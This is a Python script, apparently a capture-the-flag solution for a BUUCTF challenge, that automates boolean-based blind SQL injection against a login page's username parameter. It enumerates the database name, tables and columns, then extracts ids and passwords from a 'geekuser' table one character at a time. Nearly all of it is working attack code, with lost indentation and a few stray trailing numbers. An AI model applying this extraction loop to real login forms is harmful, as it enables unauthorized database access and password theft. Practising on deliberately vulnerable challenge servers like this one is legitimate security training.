import requests
from urllib.parse import quote,unquote
import time
class SQL:
URL='http://0b810b9d-3e3a-4655-8cb2-44efea7ab49e.node5.buuoj.cn:81/'
'''
for i in xxx: ??
1.qwertyuiopasdfghjklzxcvbnm, 手动输入键盘的字符
2.range(ord('a'),ord('z')+1)
3.ascii
'''
ascii=''
for i in range(33,127):
ascii+=chr(i)
def __init__(self):
self.判断当前数据库字符名称个数()
self.当前数据库名称()
self.表名称个数()
self.表名()
self.字段名个数()
self.字段名()
self.判断id个数()
self.id()
#self.username个数()
self.idusernaempassword()
def idusernaempassword(self):
daima=''
for ix in range(0,10000):
for i in self.ascii:
sql=f"1' or (select substring(group_concat(password),{ix},1)='{i}' from geekuser) #"
sql=quote(sql)
url=f'{self.URL}check.php?username={sql}&password=11'
res=requests.get(url).text
time.sleep(0.1)
if 'flag' in res:
daima+=str(i)
print(daima)
def username个数(self):
for i in range(1,1000000000):
sql=f"'1 or (select length(group_concat(username))={i} from geekuser) #"
if self.sql注入(sql):
print(self.sql注入(sql))
def id(self):
daima=''
ascii=self.ascii
for ix in range(8):
for i in ascii:
sql=f"1' or (select substring(group_concat(id),{ix},1)='{i}' from geekuser) #"
sql=quote(sql)
url=f'{self.URL}check.php?username={sql}&password=11'
res=requests.get(url).text
time.sleep(0.1)
if 'flag' in res:
daima+=str(i)
print(daima)
def 判断id个数(self):
for i in range(1,100):
sql=f"1' or (select length(group_concat(id))={i} from geek.geekuser) #"
if self.sql注入(sql):
print(self.sql注入(sql))
def 字段名(self):
daima=''
for ix in range(0,21):
for i in 'qwertyuiopasdfghjklzxcvbnm,':
sql=f"1' or (select substring(group_concat(COLUMN_NAME),{ix},1)='{i}' from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='geekuser') #"
sql=quote(sql)
url=f'{self.URL}check.php?username={sql}&password=11'
res=requests.get(url).text
time.sleep(0.1)
if 'flag' in res:
daima+=i
print(daima)
else:
print(len(daima))
print(daima)
def 字段名个数(self):
for i in range(1,100):
sql=f"1' or (select length(group_concat(COLUMN_NAME))={i} from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='geekuser') #"
if self.sql注入(sql):
print(self.sql注入(sql))
def 表名(self):
daima=''
for ix in range(0,9):
for i in 'qwertyuiopasdfghjklzxcvbnm,':
sql=f"1' or (SELECT substring(GROUP_CONCAT(TABLE_NAME),{ix},1)='{i}' FROM information_schema.TABLES WHERE TABLE_SCHEMA=DATABASE()) #"
sql=quote(sql)
url=url=f'{self.URL}check.php?username={sql}&password=11'
res=requests.get(url).text
if 'flag' in res:
daima+=i
print(daima)
def 表名称个数(self):
for i in range(1000):
sql=f"1' or (SELECT LENGTH(GROUP_CONCAT(TABLE_NAME))={i} FROM information_schema.TABLES WHERE TABLE_SCHEMA=DATABASE()) #"
print(self.sql注入(sql))
def 当前数据库名称(self):
for i in range(ord('a'),ord('z')+1):
sql=f"1' or left(database(),4)='gee{chr(i)}' #"
print(self.sql注入(sql))
def 判断当前数据库字符名称个数(self):
for count in range(10):
sql=f"1' or length(database())={count} #"
print(self.sql注入(sql))
def sql注入(self,sql):
sql=quote(sql)
url=url=f'{self.URL}check.php?username={sql}&password=11'
res=requests.get(url).text
#time.sleep(0.1)
if 'flag' in res:
return unquote(sql)
sql=SQL()
08-25
971
04-15
363